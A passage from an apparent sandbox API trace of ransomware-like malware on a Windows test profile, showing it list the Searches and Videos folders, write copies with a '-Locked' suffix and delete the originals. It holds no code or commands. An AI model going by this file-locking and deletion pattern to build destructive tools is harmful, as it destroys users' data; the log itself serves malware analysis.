ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x379598d3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0307.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0307.397] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links")) returned 0 [0307.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.401] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches", lpFilePart=0x0) returned 0x1e [0307.401] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpFilePart=0x0) returned 0x1f [0307.401] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b6a9c9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b6a9c9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b6a9c9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0307.402] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b7a6fe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms-Locked", cAlternateFileName="EVERYW~2.SEA")) returned 1 [0307.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0307.403] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.403] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches", lpFilePart=0x0) returned 0x1e [0307.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpFilePart=0x0) returned 0x1f [0307.404] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b6a9c9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b6a9c9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b6a9c9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0307.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b7a6fe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms-Locked", cAlternateFileName="EVERYW~2.SEA")) returned 1 [0307.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0307.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0307.405] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.406] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x38 [0307.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.406] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.406] GetFileType (hFile=0x49c) returned 0x1 [0307.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.407] GetFileType (hFile=0x49c) returned 0x1 [0307.408] CloseHandle (hObject=0x49c) returned 1 [0307.408] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0307.408] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini-locked")) returned 1 [0307.416] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked", lpFilePart=0x0) returned 0x3a [0307.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.416] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.417] GetFileType (hFile=0x49c) returned 0x1 [0307.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.417] GetFileType (hFile=0x49c) returned 0x1 [0307.418] CloseHandle (hObject=0x49c) returned 1 [0307.419] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms", lpFilePart=0x0) returned 0x33 [0307.419] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms")) returned 0 [0307.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.421] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos", lpFilePart=0x0) returned 0x1c [0307.421] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpFilePart=0x0) returned 0x1d [0307.421] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.421] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.427] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FfeATZnfpFdMi", cAlternateFileName="1FFEAT~1")) returned 1 [0307.427] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bbc640, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35bbc640, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35bbc640, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bsya RNak.avi-Locked", cAlternateFileName="BSYARN~2.AVI")) returned 1 [0307.428] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c6c39f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c6c39f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c6c39f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.428] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ab37d0, ftCreationTime.dwHighDateTime=0x1d7e120, ftLastAccessTime.dwLowDateTime=0xa8984b40, ftLastAccessTime.dwHighDateTime=0x1d7e501, ftLastWriteTime.dwLowDateTime=0xa8984b40, ftLastWriteTime.dwHighDateTime=0x1d7e501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHpS", cAlternateFileName="")) returned 1 [0307.428] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c75e70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c75e70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c75e70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="r6h4I4TkF0BMMvPDE.swf-Locked", cAlternateFileName="R6H4I4~2.SWF")) returned 1 [0307.428] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c7fbe1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c7fbe1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c7fbe1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi-Locked", cAlternateFileName="RLWJRP~1.AVI")) returned 1 [0307.428] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.429] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos", lpFilePart=0x0) returned 0x1c [0307.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpFilePart=0x0) returned 0x1d [0307.430] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.430] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.430] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FfeATZnfpFdMi", cAlternateFileName="1FFEAT~1")) returned 1 [0307.430] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bbc640, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35bbc640, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35bbc640, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bsya RNak.avi-Locked", cAlternateFileName="BSYARN~2.AVI")) returned 1 [0307.431] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c6c39f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c6c39f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c6c39f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.431] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ab37d0, ftCreationTime.dwHighDateTime=0x1d7e120, ftLastAccessTime.dwLowDateTime=0xa8984b40, ftLastAccessTime.dwHighDateTime=0x1d7e501, ftLastWriteTime.dwLowDateTime=0xa8984b40, ftLastWriteTime.dwHighDateTime=0x1d7e501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHpS", cAlternateFileName="")) returned 1 [0307.431] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c75e70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c75e70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c75e70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="r6h4I4TkF0BMMvPDE.swf-Locked", cAlternateFileName="R6H4I4~2.SWF")) returned 1 [0307.431] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c7fbe1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c7fbe1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c7fbe1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi-Locked", cAlternateFileName="RLWJRP~1.AVI")) returned 1 [0307.432] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c7fbe1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35c7fbe1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c7fbe1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi-Locked", cAlternateFileName="RLWJRP~1.AVI")) returned 0 [0307.432] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.432] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked-Locked", lpFilePart=0x0) returned 0x38 [0307.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.432] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\bsya rnak.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.433] GetFileType (hFile=0x49c) returned 0x1 [0307.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.433] GetFileType (hFile=0x49c) returned 0x1 [0307.435] CloseHandle (hObject=0x49c) returned 1 [0307.435] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked", lpFilePart=0x0) returned 0x31 [0307.436] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\bsya rnak.avi-locked")) returned 1 [0307.436] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: 